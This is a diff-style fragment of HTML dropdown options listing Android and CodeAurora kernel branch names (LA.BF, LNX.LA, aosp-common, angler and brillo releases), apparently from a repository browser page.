-<option value='caf/3.10/caf/LA.BF.1.1.2_rb1.22'>caf/3.10/caf/LA.BF.1.1.2_rb1.22</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb1.23'>caf/3.10/caf/LA.BF.1.1.2_rb1.23</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb1.24'>caf/3.10/caf/LA.BF.1.1.2_rb1.24</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb1.3'>caf/3.10/caf/LA.BF.1.1.2_rb1.3</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb1.5'>caf/3.10/caf/LA.BF.1.1.2_rb1.5</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb1.7'>caf/3.10/caf/LA.BF.1.1.2_rb1.7</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb1.9'>caf/3.10/caf/LA.BF.1.1.2_rb1.9</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb3'>caf/3.10/caf/LA.BF.1.1.2_rb3</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb3.2'>caf/3.10/caf/LA.BF.1.1.2_rb3.2</option>
-<option value='caf/3.10/caf/LA.BF.1.1.2_rb4.1'>caf/3.10/caf/LA.BF.1.1.2_rb4.1</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.10'>caf/3.10/caf/LA.BF.1.1.3_rb1.10</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.11'>caf/3.10/caf/LA.BF.1.1.3_rb1.11</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.12'>caf/3.10/caf/LA.BF.1.1.3_rb1.12</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.13'>caf/3.10/caf/LA.BF.1.1.3_rb1.13</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.15'>caf/3.10/caf/LA.BF.1.1.3_rb1.15</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.2'>caf/3.10/caf/LA.BF.1.1.3_rb1.2</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.3'>caf/3.10/caf/LA.BF.1.1.3_rb1.3</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.4'>caf/3.10/caf/LA.BF.1.1.3_rb1.4</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.5'>caf/3.10/caf/LA.BF.1.1.3_rb1.5</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.6'>caf/3.10/caf/LA.BF.1.1.3_rb1.6</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.7'>caf/3.10/caf/LA.BF.1.1.3_rb1.7</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.8'>caf/3.10/caf/LA.BF.1.1.3_rb1.8</option>
-<option value='caf/3.10/caf/LA.BF.1.1.3_rb1.9'>caf/3.10/caf/LA.BF.1.1.3_rb1.9</option>
-<option value='caf/3.10/caf/LA.BF.1.1_rb1.10'>caf/3.10/caf/LA.BF.1.1_rb1.10</option>
-<option value='caf/3.10/caf/LA.BF.1.1_rb1.11'>caf/3.10/caf/LA.BF.1.1_rb1.11</option>
-<option value='caf/3.10/caf/LA.BF.1.1_rb1.12'>caf/3.10/caf/LA.BF.1.1_rb1.12</option>
-<option value='caf/3.10/caf/LA.BF.1.1_rb1.14'>caf/3.10/caf/LA.BF.1.1_rb1.14</option>
-<option value='caf/3.10/caf/LA.BF.1.1_rb1.16'>caf/3.10/caf/LA.BF.1.1_rb1.16</option>
-<option value='caf/3.10/caf/LA.BF.1.1_rb1.9'>caf/3.10/caf/LA.BF.1.1_rb1.9</option>
-<option value='caf/3.10/caf/LNX.LA.2.7.3'>caf/3.10/caf/LNX.LA.2.7.3</option>
-<option value='caf/3.10/caf/LNX.LA.2.7.4'>caf/3.10/caf/LNX.LA.2.7.4</option>
-<option value='caf/3.10/caf/LNX.LA.3.2.1.5'>caf/3.10/caf/LNX.LA.3.2.1.5</option>
-<option value='caf/3.10/caf/LNX.LA.3.2.1.5.c1'>caf/3.10/caf/LNX.LA.3.2.1.5.c1</option>
-<option value='caf/3.10/caf/LNX.LA.3.2.5.1'>caf/3.10/caf/LNX.LA.3.2.5.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.2.7'>caf/3.10/caf/LNX.LA.3.2.7</option>
-<option value='caf/3.10/caf/LNX.LA.3.2.7_rb1'>caf/3.10/caf/LNX.LA.3.2.7_rb1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.1'>caf/3.10/caf/LNX.LA.3.5.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.1.1'>caf/3.10/caf/LNX.LA.3.5.1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.1.1.1'>caf/3.10/caf/LNX.LA.3.5.1.1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.1.4_RB1'>caf/3.10/caf/LNX.LA.3.5.1.4_RB1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.1.5'>caf/3.10/caf/LNX.LA.3.5.1.5</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.1_RB1.1'>caf/3.10/caf/LNX.LA.3.5.1_RB1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.1_RB1.2'>caf/3.10/caf/LNX.LA.3.5.1_RB1.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2'>caf/3.10/caf/LNX.LA.3.5.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.1.1'>caf/3.10/caf/LNX.LA.3.5.2.1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.1.2'>caf/3.10/caf/LNX.LA.3.5.2.1.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.1.5'>caf/3.10/caf/LNX.LA.3.5.2.1.5</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.1.5_1'>caf/3.10/caf/LNX.LA.3.5.2.1.5_1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.1_RB1.1'>caf/3.10/caf/LNX.LA.3.5.2.1_RB1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2'>caf/3.10/caf/LNX.LA.3.5.2.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.1'>caf/3.10/caf/LNX.LA.3.5.2.2.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.1_rb1'>caf/3.10/caf/LNX.LA.3.5.2.2.1_rb1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.2'>caf/3.10/caf/LNX.LA.3.5.2.2.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.2_rb1'>caf/3.10/caf/LNX.LA.3.5.2.2.2_rb1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.c3_rb1'>caf/3.10/caf/LNX.LA.3.5.2.2.c3_rb1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.c4_1'>caf/3.10/caf/LNX.LA.3.5.2.2.c4_1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.c5'>caf/3.10/caf/LNX.LA.3.5.2.2.c5</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.c5.2'>caf/3.10/caf/LNX.LA.3.5.2.2.c5.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.c6'>caf/3.10/caf/LNX.LA.3.5.2.2.c6</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2.c7'>caf/3.10/caf/LNX.LA.3.5.2.2.c7</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.2_rb1'>caf/3.10/caf/LNX.LA.3.5.2.2_rb1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2.3_RB1.1'>caf/3.10/caf/LNX.LA.3.5.2.3_RB1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2_RB1'>caf/3.10/caf/LNX.LA.3.5.2_RB1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.2_RB1.1'>caf/3.10/caf/LNX.LA.3.5.2_RB1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3'>caf/3.10/caf/LNX.LA.3.5.3</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3.1'>caf/3.10/caf/LNX.LA.3.5.3.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3.2'>caf/3.10/caf/LNX.LA.3.5.3.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3.3'>caf/3.10/caf/LNX.LA.3.5.3.3</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3.3_rb1.1'>caf/3.10/caf/LNX.LA.3.5.3.3_rb1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3.4'>caf/3.10/caf/LNX.LA.3.5.3.4</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB1.1'>caf/3.10/caf/LNX.LA.3.5.3_RB1.1</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB1.2'>caf/3.10/caf/LNX.LA.3.5.3_RB1.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB1.3'>caf/3.10/caf/LNX.LA.3.5.3_RB1.3</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB1.4'>caf/3.10/caf/LNX.LA.3.5.3_RB1.4</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB2.2'>caf/3.10/caf/LNX.LA.3.5.3_RB2.2</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB2.3'>caf/3.10/caf/LNX.LA.3.5.3_RB2.3</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB2.4'>caf/3.10/caf/LNX.LA.3.5.3_RB2.4</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.3_RB2.5'>caf/3.10/caf/LNX.LA.3.5.3_RB2.5</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.5'>caf/3.10/caf/LNX.LA.3.5.5</option>
-<option value='caf/3.10/caf/LNX.LA.3.5.5_rb1'>caf/3.10/caf/LNX.LA.3.5.5_rb1</option>
-<option value='caf/3.10/caf/LNX.LE.2.1'>caf/3.10/caf/LNX.LE.2.1</option>
-<option value='caf/3.10/caf/LNX.LE.3.2.1'>caf/3.10/caf/LNX.LE.3.2.1</option>
-<option value='caf/3.10/caf/LNX.LE.3.2.c1'>caf/3.10/caf/LNX.LE.3.2.c1</option>
-<option value='caf/3.10/caf/LNX.LER.1.0'>caf/3.10/caf/LNX.LER.1.0</option>
-<option value='caf/3.10/caf/LNX.LF.3.5.1_RB1.2'>caf/3.10/caf/LNX.LF.3.5.1_RB1.2</option>
-<option value='caf/3.10/caf/MQ/caf-master'>caf/3.10/caf/MQ/caf-master</option>
-<option value='caf/3.10/caf/MQ/jasonh'>caf/3.10/caf/MQ/jasonh</option>
-<option value='caf/3.10/caf/MQ/kgsl_sync_dump_update'>caf/3.10/caf/MQ/kgsl_sync_dump_update</option>
-<option value='caf/3.10/caf/Q8650BSDCAALZA2140'>caf/3.10/caf/Q8650BSDCAALZA2140</option>
-<option value='caf/3.10/caf/Q8650BSDCAOLZA2155'>caf/3.10/caf/Q8650BSDCAOLZA2155</option>
-<option value='caf/3.10/caf/Q8650BSDCAOLZA2170'>caf/3.10/caf/Q8650BSDCAOLZA2170</option>
-<option value='caf/3.10/caf/android-msm-2.6.27'>caf/3.10/caf/android-msm-2.6.27</option>
-<option value='caf/3.10/caf/android-msm-2.6.29'>caf/3.10/caf/android-msm-2.6.29</option>
-<option value='caf/3.10/caf/android-msm-2.6.29-donut'>caf/3.10/caf/android-msm-2.6.29-donut</option>
-<option value='caf/3.10/caf/android-msm-2.6.29b'>caf/3.10/caf/android-msm-2.6.29b</option>
-<option value='caf/3.10/caf/android-msm-2.6.32'>caf/3.10/caf/android-msm-2.6.32</option>
-<option value='caf/3.10/caf/android-msm-2.6.35'>caf/3.10/caf/android-msm-2.6.35</option>
-<option value='caf/3.10/caf/android-msm-2.6.35-froyo'>caf/3.10/caf/android-msm-2.6.35-froyo</option>
-<option value='caf/3.10/caf/aosp-common/android-2.6.39'>caf/3.10/caf/aosp-common/android-2.6.39</option>
-<option value='caf/3.10/caf/aosp-common/android-3.0'>caf/3.10/caf/aosp-common/android-3.0</option>
-<option value='caf/3.10/caf/aosp-common/android-3.10'>caf/3.10/caf/aosp-common/android-3.10</option>
-<option value='caf/3.10/caf/aosp-common/android-3.10-adf'>caf/3.10/caf/aosp-common/android-3.10-adf</option>
-<option value='caf/3.10/caf/aosp-common/android-3.10.y'>caf/3.10/caf/aosp-common/android-3.10.y</option>
-<option value='caf/3.10/caf/aosp-common/android-3.14'>caf/3.10/caf/aosp-common/android-3.14</option>
-<option value='caf/3.10/caf/aosp-common/android-3.18'>caf/3.10/caf/aosp-common/android-3.18</option>
-<option value='caf/3.10/caf/aosp-common/android-3.18-n-release'>caf/3.10/caf/aosp-common/android-3.18-n-release</option>
-<option value='caf/3.10/caf/aosp-common/android-3.18-o-release'>caf/3.10/caf/aosp-common/android-3.18-o-release</option>
-<option value='caf/3.10/caf/aosp-common/android-3.3'>caf/3.10/caf/aosp-common/android-3.3</option>
-<option value='caf/3.10/caf/aosp-common/android-3.4'>caf/3.10/caf/aosp-common/android-3.4</option>
-<option value='caf/3.10/caf/aosp-common/android-3.4-compat'>caf/3.10/caf/aosp-common/android-3.4-compat</option>
-<option value='caf/3.10/caf/aosp-common/android-4.1'>caf/3.10/caf/aosp-common/android-4.1</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4'>caf/3.10/caf/aosp-common/android-4.4</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4-eas-test'>caf/3.10/caf/aosp-common/android-4.4-eas-test</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4-llvm'>caf/3.10/caf/aosp-common/android-4.4-llvm</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4-n'>caf/3.10/caf/aosp-common/android-4.4-n</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4-n-release'>caf/3.10/caf/aosp-common/android-4.4-n-release</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4-o'>caf/3.10/caf/aosp-common/android-4.4-o</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4-o-release'>caf/3.10/caf/aosp-common/android-4.4-o-release</option>
-<option value='caf/3.10/caf/aosp-common/android-4.4.y'>caf/3.10/caf/aosp-common/android-4.4.y</option>
-<option value='caf/3.10/caf/aosp-common/android-4.9'>caf/3.10/caf/aosp-common/android-4.9</option>
-<option value='caf/3.10/caf/aosp-common/android-4.9-eas-dev'>caf/3.10/caf/aosp-common/android-4.9-eas-dev</option>
-<option value='caf/3.10/caf/aosp-common/android-4.9-llvm'>caf/3.10/caf/aosp-common/android-4.9-llvm</option>
-<option value='caf/3.10/caf/aosp-common/android-4.9-o'>caf/3.10/caf/aosp-common/android-4.9-o</option>
-<option value='caf/3.10/caf/aosp-common/android-4.9-o-release'>caf/3.10/caf/aosp-common/android-4.9-o-release</option>
-<option value='caf/3.10/caf/aosp-common/android-trusty-3.10'>caf/3.10/caf/aosp-common/android-trusty-3.10</option>
-<option value='caf/3.10/caf/aosp-common/android-trusty-3.18'>caf/3.10/caf/aosp-common/android-trusty-3.18</option>
-<option value='caf/3.10/caf/aosp-common/android-trusty-4.4'>caf/3.10/caf/aosp-common/android-trusty-4.4</option>
-<option value='caf/3.10/caf/aosp-common/android-trusty-4.9'>caf/3.10/caf/aosp-common/android-trusty-4.9</option>
-<option value='caf/3.10/caf/aosp-common/bcmdhd-3.10'>caf/3.10/caf/aosp-common/bcmdhd-3.10</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m10-dev'>caf/3.10/caf/aosp-common/brillo-m10-dev</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m10-release'>caf/3.10/caf/aosp-common/brillo-m10-release</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m7-dev'>caf/3.10/caf/aosp-common/brillo-m7-dev</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m7-mr-dev'>caf/3.10/caf/aosp-common/brillo-m7-mr-dev</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m7-release'>caf/3.10/caf/aosp-common/brillo-m7-release</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m8-dev'>caf/3.10/caf/aosp-common/brillo-m8-dev</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m8-release'>caf/3.10/caf/aosp-common/brillo-m8-release</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m9-dev'>caf/3.10/caf/aosp-common/brillo-m9-dev</option>
-<option value='caf/3.10/caf/aosp-common/brillo-m9-release'>caf/3.10/caf/aosp-common/brillo-m9-release</option>
-<option value='caf/3.10/caf/aosp-common/coupled-cpuidle'>caf/3.10/caf/aosp-common/coupled-cpuidle</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-2.6.39'>caf/3.10/caf/aosp-common/deprecated/android-2.6.39</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-3.0'>caf/3.10/caf/aosp-common/deprecated/android-3.0</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-3.10-adf'>caf/3.10/caf/aosp-common/deprecated/android-3.10-adf</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-3.14'>caf/3.10/caf/aosp-common/deprecated/android-3.14</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-3.3'>caf/3.10/caf/aosp-common/deprecated/android-3.3</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-3.4'>caf/3.10/caf/aosp-common/deprecated/android-3.4</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-3.4-compat'>caf/3.10/caf/aosp-common/deprecated/android-3.4-compat</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-4.1'>caf/3.10/caf/aosp-common/deprecated/android-4.1</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/android-4.4.y'>caf/3.10/caf/aosp-common/deprecated/android-4.4.y</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/coupled-cpuidle'>caf/3.10/caf/aosp-common/deprecated/coupled-cpuidle</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.10'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.10</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.10-rc5'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.10-rc5</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.14'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.14</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.18'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.18</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.8'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.8</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.9'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.9</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.9-rc2'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.9-rc2</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/experimental/android-3.9-rc7'>caf/3.10/caf/aosp-common/deprecated/experimental/android-3.9-rc7</option>
-<option value='caf/3.10/caf/aosp-common/deprecated/linux-bcm43xx-2.6.39'>caf/3.10/caf/aosp-common/deprecated/linux-bcm43xx-2.6.39</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.10'>caf/3.10/caf/aosp-common/experimental/android-3.10</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.10-rc5'>caf/3.10/caf/aosp-common/experimental/android-3.10-rc5</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.14'>caf/3.10/caf/aosp-common/experimental/android-3.14</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.18'>caf/3.10/caf/aosp-common/experimental/android-3.18</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.8'>caf/3.10/caf/aosp-common/experimental/android-3.8</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.9'>caf/3.10/caf/aosp-common/experimental/android-3.9</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.9-rc2'>caf/3.10/caf/aosp-common/experimental/android-3.9-rc2</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-3.9-rc7'>caf/3.10/caf/aosp-common/experimental/android-3.9-rc7</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-4.1'>caf/3.10/caf/aosp-common/experimental/android-4.1</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-4.4'>caf/3.10/caf/aosp-common/experimental/android-4.4</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-4.4-eas'>caf/3.10/caf/aosp-common/experimental/android-4.4-eas</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-4.4-llvm'>caf/3.10/caf/aosp-common/experimental/android-4.4-llvm</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-4.9'>caf/3.10/caf/aosp-common/experimental/android-4.9</option>
-<option value='caf/3.10/caf/aosp-common/experimental/android-4.9-llvm'>caf/3.10/caf/aosp-common/experimental/android-4.9-llvm</option>
-<option value='caf/3.10/caf/aosp-common/linux-bcm43xx-2.6.39'>caf/3.10/caf/aosp-common/linux-bcm43xx-2.6.39</option>
-<option value='caf/3.10/caf/aosp-common/master'>caf/3.10/caf/aosp-common/master</option>
-<option value='caf/3.10/caf/aosp-common/ref/for/android-3.10'>caf/3.10/caf/aosp-common/ref/for/android-3.10</option>
-<option value='caf/3.10/caf/aosp-common/upstream-f2fs-stable-linux-3.18.y'>caf/3.10/caf/aosp-common/upstream-f2fs-stable-linux-3.18.y</option>
-<option value='caf/3.10/caf/aosp-common/upstream-f2fs-stable-linux-4.4.y'>caf/3.10/caf/aosp-common/upstream-f2fs-stable-linux-4.4.y</option>
-<option value='caf/3.10/caf/aosp-common/upstream-f2fs-stable-linux-4.9.y'>caf/3.10/caf/aosp-common/upstream-f2fs-stable-linux-4.9.y</option>
-<option value='caf/3.10/caf/aosp-common/upstream-linux-3.18.y'>caf/3.10/caf/aosp-common/upstream-linux-3.18.y</option>
-<option value='caf/3.10/caf/aosp-common/upstream-linux-4.4.y'>caf/3.10/caf/aosp-common/upstream-linux-4.4.y</option>
-<option value='caf/3.10/caf/aosp-common/upstream-linux-4.8.y'>caf/3.10/caf/aosp-common/upstream-linux-4.8.y</option>
-<option value='caf/3.10/caf/aosp-common/upstream-linux-4.9.y'>caf/3.10/caf/aosp-common/upstream-linux-4.9.y</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-2.6.25'>caf/3.10/caf/aosp-kernel-common/android-2.6.25</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-2.6.27'>caf/3.10/caf/aosp-kernel-common/android-2.6.27</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-2.6.29'>caf/3.10/caf/aosp-kernel-common/android-2.6.29</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-2.6.32'>caf/3.10/caf/aosp-kernel-common/android-2.6.32</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-2.6.35'>caf/3.10/caf/aosp-kernel-common/android-2.6.35</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-2.6.36'>caf/3.10/caf/aosp-kernel-common/android-2.6.36</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-goldfish-2.6.27'>caf/3.10/caf/aosp-kernel-common/android-goldfish-2.6.27</option>
-<option value='caf/3.10/caf/aosp-kernel-common/android-goldfish-2.6.29'>caf/3.10/caf/aosp-kernel-common/android-goldfish-2.6.29</option>
-<option value='caf/3.10/caf/aosp-new/android-4.4'>caf/3.10/caf/aosp-new/android-4.4</option>
-<option value='caf/3.10/caf/aosp-new/android-4.4.y'>caf/3.10/caf/aosp-new/android-4.4.y</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-2.6.35'>caf/3.10/caf/aosp-new/android-msm-2.6.35</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-3.9-usb-and-mmc-hacks'>caf/3.10/caf/aosp-new/android-msm-3.9-usb-and-mmc-hacks</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr1.5'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr1.5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr1.6'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr1.6</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr1.6-1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-dr1.6-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-mr1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-mr1-eas'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-marshmallow-mr1-eas</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr1-preview-1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr1-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr1-preview-2'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr1-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr2-preview-1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr2-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr2-preview-2'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-mr2-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-2'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-3'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-4'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-5'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-n-preview-5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-bugfix'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-bugfix</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-hwbinder'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-hwbinder</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr0.5'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr0.5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr1.1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr1.1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr1.4'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr1.4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr2'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-nougat-mr2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-1'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-1</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-2'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-2</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-3'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-3</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-4'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-o-preview-4</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-oreo-r5'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-oreo-r5</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-angler-3.10-oreo-r6'>caf/3.10/caf/aosp-new/android-msm-angler-3.10-oreo-r6</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-anthias-3.10-lollipop-mr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-anthias-3.10-lollipop-mr1-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-anthias-3.10-lollipop-wear-release'>caf/3.10/caf/aosp-new/android-msm-anthias-3.10-lollipop-wear-release</option>
-<option value='caf/3.10/caf/aosp-new/android-msm-anthias-3.10-marshmallow-dr1-wear-release'>caf/3.10/caf/aosp-new/android-msm-anthias-3.10-marshmallow-dr1-wear-release</option>
